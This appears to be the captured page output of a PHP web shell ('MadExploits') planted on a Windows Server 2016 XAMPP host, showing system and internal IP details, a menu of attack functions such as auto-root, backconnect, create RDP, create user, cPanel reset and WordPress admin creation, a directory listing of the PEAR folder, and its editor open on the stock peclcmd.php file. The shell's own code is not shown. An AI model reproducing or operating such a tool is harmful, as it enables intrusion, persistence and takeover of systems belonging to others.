Windows NT DGPENSV2LPKMN 10.0 build 14393 (Windows Server 2016) AMD64
Apache/2.4.46 (Win64) OpenSSL/1.1.1h PHP/7.3.25
: 172.16.0.66 | : 172.16.0.254
Cant Read [ /etc/named.conf ]
7.3.25
SYSTEM
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
[ A ]
[ C ]
[ D ]
C: /
xampp7 /
php /
pear /
[ HOME SHELL ]
Name
Size
Permission
Action
.channels
[ DIR ]
drwxrwxrwx
.registry
[ DIR ]
drwxrwxrwx
Archive
[ DIR ]
drwxrwxrwx
Console
[ DIR ]
drwxrwxrwx
Event
[ DIR ]
drwxrwxrwx
File
[ DIR ]
drwxrwxrwx
OS
[ DIR ]
drwxrwxrwx
PEAR
[ DIR ]
drwxrwxrwx
PHP
[ DIR ]
drwxrwxrwx
PHPUnit
[ DIR ]
drwxrwxrwx
PHPUnit2
[ DIR ]
drwxrwxrwx
Structures
[ DIR ]
drwxrwxrwx
Table
[ DIR ]
drwxrwxrwx
Text
[ DIR ]
drwxrwxrwx
XML
[ DIR ]
drwxrwxrwx
adodb
[ DIR ]
drwxrwxrwx
docs
[ DIR ]
drwxrwxrwx
examples
[ DIR ]
drwxrwxrwx
tests
[ DIR ]
drwxrwxrwx
.depdb
2.38
KB
-rw-rw-rw-
.depdblock
0
B
-rw-rw-rw-
.filemap
6.75
KB
-rw-rw-rw-
.lock
0
B
-rw-rw-rw-
PEAR.php
34.63
KB
-rw-rw-rw-
PHPUnit.php
4.01
KB
-rw-rw-rw-
System.php
19.81
KB
-rw-rw-rw-
Table.php
37.74
KB
-rw-rw-rw-
pearcmd.php
15.31
KB
-rw-rw-rw-
peclcmd.php
1.04
KB
-rw-rw-rw-
Delete
Unzip
Zip
${this.title}
Close
Code Editor : peclcmd.php
<?php /** * PEAR, the PHP Extension and Application Repository * * Command line interface * * PHP versions 4 and 5 * * @category pear * @package PEAR * @author Stig Bakken <ssb@php.net> * @author Tomas V.V.Cox <cox@idecnet.com> * @copyright 1997-2009 The Authors * @license http://opensource.org/licenses/bsd-license.php New BSD License * @link http://pear.php.net/package/PEAR */ /** * @nodep Gtk */ //the space is needed for windows include paths with trailing backslash // http://pear.php.net/bugs/bug.php?id=19482 if ('C:\xampp7\php\pear ' != '@'.'include_path'.'@ ') { ini_set('include_path', trim('C:\xampp7\php\pear '). PATH_SEPARATOR . get_include_path()); $raw = false; } else { // this is a raw, uninstalled pear, either a cvs checkout, or php distro $raw = true; } define('PEAR_RUNTYPE', 'pecl'); require_once 'pearcmd.php'; /* * Local variables: * tab-width: 4 * c-basic-offset: 4 * indent-tabs-mode: nil * mode: php * End: */ // vim600:syn=php ?>
Close